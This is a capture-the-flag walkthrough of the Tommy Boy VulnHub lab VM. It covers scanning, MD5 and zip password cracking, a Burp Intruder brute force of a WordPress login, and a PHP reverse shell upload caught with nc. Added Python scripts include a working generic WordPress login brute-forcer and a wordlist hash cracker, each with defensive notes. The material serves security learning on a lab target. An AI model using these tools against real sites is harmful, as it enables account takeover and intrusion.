Tommy Boy is an awesome VulnHub VM with an awesome story inside. The objective of this machine is to restore a backup of the website of the Callahan Auto company and collect 5 flags to unlock a final message. Let's start!
First of all, scan the machine's IP with nmap:
nmap 192.168.1.15 -A
This is the output:
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-02 15:13 CEST
Nmap scan report for 192.168.1.15
Host is up (0.0027s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|_  256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 4 disallowed entries
| /6packsofb...soda /lukeiamyourfather
|_/lookalivelowbridge /flag-numero-uno.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to Callahan Auto
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: KEEP OUT
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.79 seconds
There are 3 services running on the machine: two websites and SSH. Open 192.168.1.15 in the browser and an error message says that the backup of the website needs to be restored. Looking at the page source, I notice this:
<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment from Richard: Deal. Where's the blog again?-->
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8-->
<!--Comment from Richard: Ah! How could I forget? Thanks-->
There is a hidden company blog stored in a hidden folder whose name has to be guessed from the YouTube video linked in the comments. The video is just the phrase "Hey Prehistoric Forest", so try to open /prehistoricforest. It works, we are in the company blog! Before analyzing it, open /robots.txt, which has the interesting entries nmap reported:
User-agent: *
Disallow: /6packsofb...soda
Disallow: /lukeiamyourfather
Disallow: /lookalivelowbridge
Disallow: /flag-numero-uno.txt
There are 3 folders containing only images, which can be ignored, and a .txt file: the first flag. Browse to /flag-numero-uno.txt and the first flag is: B34rcl4ws. Now we can analyze the blog.
Open the blog again and read the posts. There is a message by Richard protected by a password that I need to find. The latest post on the blog is a request by Tom Jr. asking Richard for the password of that post, and it has a comment; read it:
Hey numbnuts, look at the /richard folder on this server. I’m sure that picture will jog your memory. Since you have a small brain: see up top in the address bar thingy? Erase “/prehistoricforest” and put “/richard” there instead.
So let's navigate to /richard and download the image shockedrichard.jpg. I am pretty sure that the password is hidden in the image metadata, so I used exiftool to dump it (exiftool shockedrichard.jpg). This is the output:
ExifTool Version Number         : 10.24
File Name                       : shockedrichard.jpg
Directory                       : /home/cristiano/Scaricati
File Size                       : 163 kB
File Modification Date/Time     : 2016:08:01 00:15:25+02:00
File Access Date/Time           : 2016:08:01 00:16:30+02:00
File Inode Change Date/Time     : 2016:08:01 00:15:25+02:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Exif Byte Order                 : Little-endian (Intel, II)
Software                        : Google
Copyright                       : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
Exif Version                    : 0220
User Comment                    : ce154b5a8e59c89732bc25d6a2e6b90b
Exif Image Width                : 1600
Exif Image Height               : 1029
XMP Toolkit                     : Image::ExifTool 9.97
Rights                          : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
Creator Tool                    : Google
Profile CMM Type                : Lino
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 1998:02:09 06:49:00
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : IEC
Device Model                    : sRGB
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Media-Relative Colorimetric
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : HP
Profile ID                      : 0
Profile Copyright               : Copyright (c) 1998 Hewlett-Packard Company
Profile Description             : sRGB IEC61966-2.1
Media White Point               : 0.95045 1 1.08905
Media Black Point               : 0 0 0
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Device Mfg Desc                 : IEC http://www.iec.ch
Device Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant         : 19.6445 20.3718 16.8089
Viewing Cond Surround           : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type    : D50
Luminance                       : 76.03647 80 87.12462
Measurement Observer            : CIE 1931
Measurement Backing             : 0 0 0
Measurement Geometry            : Unknown
Measurement Flare               : 0.999%
Measurement Illuminant          : D65
Technology                      : Cathode Ray Tube Display
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
Current IPTC Digest             : adfc7551120fa16884c295b6d397931f
Envelope Record Version         : 4
Coded Character Set             : UTF8
Application Record Version      : 4
Copyright Notice                : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
IPTC Digest                     : adfc7551120fa16884c295b6d397931f
Image Width                     : 1600
Image Height                    : 1029
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1600x1029
Megapixels                      : 1.6
The image comment (the User Comment tag) is ce154b5a8e59c89732bc25d6a2e6b90b.
Thirty-two hex characters look like an MD5 hash. Look it up on HashKiller (an online hash lookup; an unsalted MD5 of a common word is found instantly) and you get the post password: spanky. Now we can read the post. In a few words, we need to restore the website backup by renaming callahanbak.bak, which lives in Big Tom's SSH home folder, to index.html. Tom's SSH username is in the list of WordPress users, but I don't have his password. The post also says there is an FTP service on the machine listening on a port other than the default 21, and that it is unstable: every 15 minutes it goes up and down. The FTP account mentioned is nickburns, and its password, which I still need to find, is said to be very easy to guess.
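The same recovery can be done offline instead of through a lookup site, which matters when the hash must not leave the engagement. The following is an added example written for this walkthrough, not code from the original post: it guesses the algorithm from the digest length, runs a wordlist through a few cheap mangling rules, and can stream a large list such as rockyou.txt. The five-word list in the demo is constructed; the digest passed in is the one from the image comment above.

```python
import hashlib

# Digest length in hex characters -> hashlib algorithm name. An unsalted digest
# of a short, common word falls to a wordlist in milliseconds whichever it is.
ALGOS_BY_HEX_LEN = {32: "md5", 40: "sha1", 64: "sha256"}


def guess_algorithm(digest_hex):
    """Pick the algorithm from the digest length; raise if it is not one we know."""
    try:
        return ALGOS_BY_HEX_LEN[len(digest_hex)]
    except KeyError:
        raise ValueError(f"unrecognised digest length {len(digest_hex)}")


def digest_of(word, algo="md5"):
    """Hex digest of a plaintext; used by the demo and to build test vectors."""
    return hashlib.new(algo, word.encode()).hexdigest()


def mangle(word):
    """Yield the word plus a few cheap variations (lookup-site style rules)."""
    yield word
    yield word.capitalize()
    yield word.upper()
    for suffix in ("1", "123", "!", "2016"):
        yield word + suffix
        yield word.capitalize() + suffix


def crack_digest(digest_hex, wordlist, mangling=True):
    """Return the plaintext whose digest matches, or None if the list is exhausted."""
    digest_hex = digest_hex.strip().lower()
    algo = guess_algorithm(digest_hex)
    for word in wordlist:
        candidates = mangle(word) if mangling else (word,)
        for cand in candidates:
            if digest_of(cand, algo) == digest_hex:
                return cand
    return None


def crack_file(digest_hex, path, encoding="latin-1"):
    """Stream a wordlist file (e.g. rockyou.txt) without loading it into memory."""
    with open(path, encoding=encoding, errors="ignore") as fh:
        return crack_digest(digest_hex, (line.rstrip("\r\n") for line in fh))


if __name__ == "__main__":
    # Constructed mini wordlist; a real run would call crack_file(..., "rockyou.txt").
    words = ["password", "callahan", "brakepad", "spanky", "tommy"]
    print(crack_digest("ce154b5a8e59c89732bc25d6a2e6b90b", words))
```

The lesson for the defender is the one the VM is built around: a hash in a public image comment is only as strong as the password behind it, and an unsalted fast hash of a dictionary word is not a secret at all.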
Let's finish analyzing the remaining posts. Note the first post made on this blog and open its comment:
Well put boss 😉 Flag #2: thisisthesecondflagyayyou.txt
Navigate to /prehistoricforest/thisisthesecondflagyayyou.txt and collect the second flag: Z4l1nsky. Now I can go further.
I focus on the FTP service. The first scan only covered nmap's default top 1000 ports, so I rescan the IP across the full port range:
nmap 192.168.1.15 -p 1-65535
And now a wild port appears:
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-02 15:41 CEST
Nmap scan report for 192.168.1.15
Host is up (0.029s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
8008/tcp  open  http
65534/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 9.62 seconds
Open an ftp command shell and type:
open 192.168.1.15 65534
I use nickburns as the username and still need the password. Nick said it is easy to guess, and the simplest guess is the username itself, so I try nickburns as the password. It works: I am logged into the FTP server. Listing the files shows a readme.txt. Download it (get readme.txt):
Close the ftp shell and read the file:
It is a message from Nick: there is a /NickIzL33t folder somewhere on the server holding an encrypted .zip with all of Big Tom's passwords, and Nick also uses that folder as a Dropbox to reach his files from his phone. There is no such folder on the port 80 site, but there is the second HTTP service on port 8008, so navigate to 192.168.1.15:8008 and a simple HTML page from Nick appears. /NickIzL33t on that port shows another HTML page from Nick that seems to contain nothing. The "from the phone" remark suggests the server keys on the client, so with Burp Suite as proxy I change my User-Agent to a mobile (iOS) one, and when I refresh the page it changes! There is a message saying:
Gotta know the EXACT name of the .html to break into this fortress.
So it's time for a brute-force attack. I captured the GET request with Burp Suite by refreshing the page, then sent it to Intruder with the following payload position:
GET /NickIzL33t/§page§.html HTTP/1.1
Host: 192.168.1.15:8008
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
If-Modified-Since: Fri, 15 Jul 2016 02:11:27 GMT
If-None-Match: "10e-537a322dc0ba6-gzip"
Cache-Control: max-age=0
I used rockyou.txt as the wordlist and started the attack. After some minutes fallon1.html came back with response code 200 (every other name returned 404). So I navigate to /NickIzL33t/fallon1.html, still with the mobile User-Agent, and the famous page shows up.
It contains a hint:
Big Tom,
Your password vault is protected with (yep, you guessed it) a PASSWORD! And because you were choosing stupidiculous passwords like "password123" and "brakepad" I enforced new password requirements on you...13 characters baby! MUAHAHAHAHAH!!!
Your password is your wife's nickname "bev" (note it's all lowercase) plus the following:
* One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters
Yeah, fat man, that's a lot of keys to push but make sure you type them altogether in one big chunk ok? Heh, "big chunk." A big chunk typing big chunks. That's funny. LOL
-Nick
The page also holds the 3rd flag, TinyHead, and the encrypted .zip file with Big Tom's passwords.
Now I need to crack the password of the .zip. Fortunately the hint gives the password's structure, so I use crunch to generate a wordlist matching it (in a crunch -t pattern , stands for an uppercase letter, % for a digit, @ for a lowercase letter and ^ for a symbol; every other character is kept literally):
crunch 13 13 -t bev,%%@@^1995 -o wordlist.txt
Then I run fcrackzip against the archive in dictionary mode (-D with -p pointing at the wordlist; -u makes it confirm each candidate with unzip so false positives are weeded out):
fcrackzip -u -v -D -p wordlist.txt t0msp4ssw0rdz.zip
After some minutes the password is found: bevH00tr$1995
Unzip the file and open passwords.txt. The interesting section:
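The reason the crack finishes in minutes is that Nick's "13 characters" policy leaks its own structure: seven of the thirteen positions are fixed and the rest come from small classes. The following is an added example for this walkthrough, not code from the original post, that models the crunch -t mask in Python, computes the resulting keyspace, checks a candidate against the mask, and can write the same wordlist crunch does. The symbol set is an assumption (crunch's built-in symbol list may differ slightly), which changes the count but not the method.

```python
import itertools
import string

# Crunch-style placeholders as used in the post's pattern bev,%%@@^1995:
#   @ lowercase   , uppercase   % digit   ^ symbol
# SYMBOLS is an assumption standing in for crunch's default symbol charset.
SYMBOLS = "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/"
CLASSES = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": SYMBOLS,
}


def parse_mask(mask):
    """Turn a crunch -t mask into one character set per position.

    Literal characters (b, e, v, 1, 9, 9, 5) become one-element sets.
    """
    return [CLASSES.get(ch, ch) for ch in mask]


def keyspace_size(mask):
    """Number of candidates the mask expands to (product of the set sizes)."""
    size = 1
    for charset in parse_mask(mask):
        size *= len(charset)
    return size


def matches_mask(candidate, mask):
    """True if candidate is one of the strings the mask would generate."""
    sets = parse_mask(mask)
    return len(candidate) == len(sets) and all(c in s for c, s in zip(candidate, sets))


def generate(mask):
    """Lazily yield every candidate, in the same order as itertools.product."""
    for combo in itertools.product(*parse_mask(mask)):
        yield "".join(combo)


def write_wordlist(mask, path):
    """Materialise the mask to a file, equivalent to crunch's -o output."""
    with open(path, "w") as fh:
        for pw in generate(mask):
            fh.write(pw + "\n")


if __name__ == "__main__":
    mask = "bev,%%@@^1995"
    print(f"{mask}: {keyspace_size(mask):,} candidates")
    print("bevH00tr$1995 fits the mask:", matches_mask("bevH00tr$1995", mask))
    # An unstructured 13-character password over 95 printable ASCII characters
    # would be 95**13 candidates; the policy shrinks that by this factor.
    print("reduction factor:", 95 ** 13 // keyspace_size(mask))
```

With 32 symbols the mask expands to 26 * 10 * 10 * 26 * 26 * 32 = 56,243,200 candidates, well within what fcrackzip checks in minutes, against roughly 5 * 10^25 for an unconstrained 13-character password. Publishing the composition rules next to the vault is what turns a long password into a short one.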
Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat
Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are. However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.
To find the SSH password I need to break into the WordPress blog, but Big Tom isn't sure of his own username there, so I use wpscan to enumerate users:
sudo wpscan -u 192.168.1.15/prehistoricforest --enumerate u
+----+----------+-------------------+ | Id | Login | Name | +----+----------+-------------------+ | 1 | richard | richard | | 2 | tom | Big Tom | | 3 | tommy | Tom Jr. | | 4 | michelle | Michelle Michelle | +----+----------+-------------------+
So Big Tom's username is tom, but I still need the password. The hint is a famous Queen song, which I read as "We Will Rock You", i.e. the rockyou.txt wordlist. So I used Burp Suite to brute-force the login: I intercepted the POST request sent by the login form with the proxy, then sent it to Intruder with the following payload position:
POST /prehistoricforest/wp-login.php HTTP/1.1
Host: 192.168.1.15
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.15/prehistoricforest/wp-login.php
Cookie: wp-postpass_3604ebf3b5bc65ba9e61d2ca579e65ae=%24P%24B137jyM8khyXYMZ82AEpHgB2Mv9OKi.; wp-settings-time-2=1470085172; wordpress_test_cookie=WP+Cookie+check
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 122

log=tom&pwd=§password§&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.15%2Fprehistoricforest%2Fwp-admin%2F&testcookie=1
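The same attack scripted without Burp, as an added example for this walkthrough rather than code from the original post. Two details of the captured request matter and are easy to get wrong in a script: a successful login is a 302 to wp-admin carrying a wordpress_logged_in_* cookie (failures are a 200 with the form again), and wp-login.php refuses a posted testcookie=1 unless the wordpress_test_cookie cookie is also sent, so a script that omits that cookie reports every password as wrong. The HTTP transport is injectable so the logic can be exercised against a fake target; the base URL, username and wordlist path are command-line arguments.

```python
import sys
import urllib.error
import urllib.parse
import urllib.request

DEFAULT_UA = "Mozilla/5.0"


def login_succeeded(status, headers):
    """wp-login.php success signal: 302 to wp-admin plus a wordpress_logged_in_* cookie."""
    set_cookie = " ".join(v for k, v in headers if k.lower() == "set-cookie")
    location = next((v for k, v in headers if k.lower() == "location"), "")
    return status == 302 and "wordpress_logged_in_" in set_cookie and "wp-admin" in location


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: the 302 itself is the evidence we want."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_post(url, form, user_agent=DEFAULT_UA):
    """Real transport: POST the form, return (status, [(header, value), ...])."""
    data = urllib.parse.urlencode(form).encode()
    headers = {
        "User-Agent": user_agent,
        # Without this cookie WordPress answers "Cookies are blocked" even for
        # the right password, because the form posts testcookie=1.
        "Cookie": "wordpress_test_cookie=WP+Cookie+check",
    }
    req = urllib.request.Request(url, data=data, headers=headers)
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, list(resp.getheaders())
    except urllib.error.HTTPError as err:  # 3xx/4xx/5xx land here with no redirect handler
        return err.code, list(err.headers.items())


def build_form(user, password, base):
    """Same fields as the captured request, with the password slot filled in."""
    return {
        "log": user,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": f"{base}/wp-admin/",
        "testcookie": "1",
    }


def brute_force(base, user, wordlist, post=http_post, user_agent=DEFAULT_UA):
    """Try each password in turn; return the first that logs in, or None.

    `post` defaults to the real transport and is swappable for testing.
    """
    url = f"{base}/wp-login.php"
    for pw in wordlist:
        pw = pw.rstrip("\r\n")
        status, headers = post(url, build_form(user, pw, base), user_agent)
        if login_succeeded(status, headers):
            return pw
    return None


if __name__ == "__main__":
    # usage: wpbrute.py http://192.168.1.15/prehistoricforest tom rockyou.txt
    base, user, path = sys.argv[1], sys.argv[2], sys.argv[3]
    with open(path, encoding="latin-1", errors="ignore") as fh:
        print(brute_force(base, user, fh))
```

This works at all because a stock WordPress install does not throttle wp-login.php; the fix on the defending side is a login-rate-limiting plugin or a web-server rule in front of that path, together with the same user-enumeration hardening that would have blunted the wpscan step.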
After some minutes the attack found tom's password: tomtom1. Time to log in and open Big Tom's draft:
Ok so Nick always yells at me for forgetting the second part of my "ess ess eight (ache? H?) password so I'm writing it here: 1938!! Nick, if you're reading this, I DON'T CARE IF I"M USING THIS THING AS A PASSWORD VAULT. YOU TOOK AWAY MY STICKIES SO I"LL PUT MY PASSWORDS ANY DANG PLACE I WANT.
So Big Tom's SSH username is bigtommysenior and the password is fatguyinalittlecoat1938!!. Log in with SSH (ssh bigtommysenior@192.168.1.15):
Enter the password and voilà, I have an SSH session. Listing the home folder shows the 4th flag, EditButton, and the backup file. Restore it:
cp callahanbak.bak /var/www/html/index.html
Browsing to /index.html now shows the home page of the website. The last flag, according to the 4th one, is in the root of this server at /5.txt.
Going to / and listing the files, I see that I can't read /5.txt: only the user www-data can, so I need to get code execution as that user. Let's look for world-writable directories, the usual place to drop something the web server will run:
find / -perm -2 -type d 2>/dev/null
An interesting one shows up: the uploads folder of the P4TCH_4D4MS page on the port 8008 site, which my SSH user can write to. Browse to /NickIzL33t/P4TCH_4D4MS (remember to keep the mobile User-Agent) and an upload form appears. Upload a PHP reverse shell (with its IP and port set to your machine and 1234) under a .jpg extension, then rename the file to .php from the SSH session, since that uploads folder is writable there. Listen locally for the incoming connection:
nc -lvp 1234
Then open /NickIzL33t/P4TCH_4D4MS/uploads/php-reverse-shell.php and the shell connects back to your local terminal as www-data. Just read the last flag (cat /5.txt):
It is Buttcrack. Now return to the SSH session, in Big Tom's home folder, and unzip LOOT.ZIP. It asks for a password, which is all the flags concatenated: B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack. THE-END.txt is extracted. Read it. The VM is completely pwned!
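The pivot to www-data rested on two misconfigurations found with the find command above: an upload directory that any local user could write to, and a web server that executed whatever landed there once it carried a .php name. The following is an added audit script for this walkthrough, not code from the original post. It reproduces `find / -perm -2 -type d` in Python, ignores sticky-bit directories such as /tmp unless asked (they are world-writable by design), and lists server-executable files inside whatever it finds. The demo tree it builds under a temporary directory is constructed for the example.

```python
import os
import stat
import tempfile

# Extensions a typical PHP-enabled Apache will execute; adjust per server.
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".sh", ".py")


def _is_world_writable_dir(path, include_sticky):
    """True for a directory with o+w set, optionally skipping sticky (/tmp-style) ones."""
    try:
        st = os.lstat(path)
    except OSError:  # unreadable or vanished: skip, like 2>/dev/null on find
        return False
    if not stat.S_ISDIR(st.st_mode) or not st.st_mode & stat.S_IWOTH:
        return False
    if st.st_mode & stat.S_ISVTX and not include_sticky:
        return False
    return True


def world_writable_dirs(root, include_sticky=False):
    """Sorted world-writable directories under root, root itself included.

    Equivalent to `find ROOT -perm -2 -type d` plus `! -perm -1000` by default.
    Symlinks are not followed so a link loop cannot trap the walk.
    """
    found = []
    for dirpath, _dirnames, _files in os.walk(root, followlinks=False):
        if _is_world_writable_dir(dirpath, include_sticky):
            found.append(dirpath)
    return sorted(found)


def executable_scripts(dirpath, exts=SCRIPT_EXTS):
    """Files with a server-executable extension anywhere below an upload directory."""
    hits = []
    for dp, _dirs, files in os.walk(dirpath, followlinks=False):
        hits.extend(os.path.join(dp, f) for f in files if f.lower().endswith(exts))
    return sorted(hits)


def build_demo_tree():
    """Constructed layout: an open uploads dir, a sticky tmp dir, a closed dir."""
    root = tempfile.mkdtemp(prefix="ww-audit-")
    uploads = os.path.join(root, "uploads")
    tmp = os.path.join(root, "tmp")
    priv = os.path.join(root, "priv")
    for d, mode in ((uploads, 0o777), (tmp, 0o1777), (priv, 0o755)):
        os.mkdir(d)
        os.chmod(d, mode)
    shell = os.path.join(uploads, "php-reverse-shell.php")  # the renamed .jpg
    with open(shell, "w") as fh:
        fh.write("<?php /* placeholder, not a real shell */ ?>\n")
    return {"root": root, "uploads": uploads, "tmp": tmp, "priv": priv, "shell": shell}


if __name__ == "__main__":
    # Real use: world_writable_dirs("/") as the low-privilege user, then inspect hits.
    paths = build_demo_tree()
    for d in world_writable_dirs(paths["root"]):
        print("world-writable:", d)
        for f in executable_scripts(d):
            print("  executable content:", f)
```

On the defending side the same two checks are the fix: the uploads directory should be writable only by the web server's own user, and the server should refuse to execute anything under it (an Apache `php_admin_flag engine off` or `Options -ExecCGI` scoped to that directory), so that a renamed image stays an inert file.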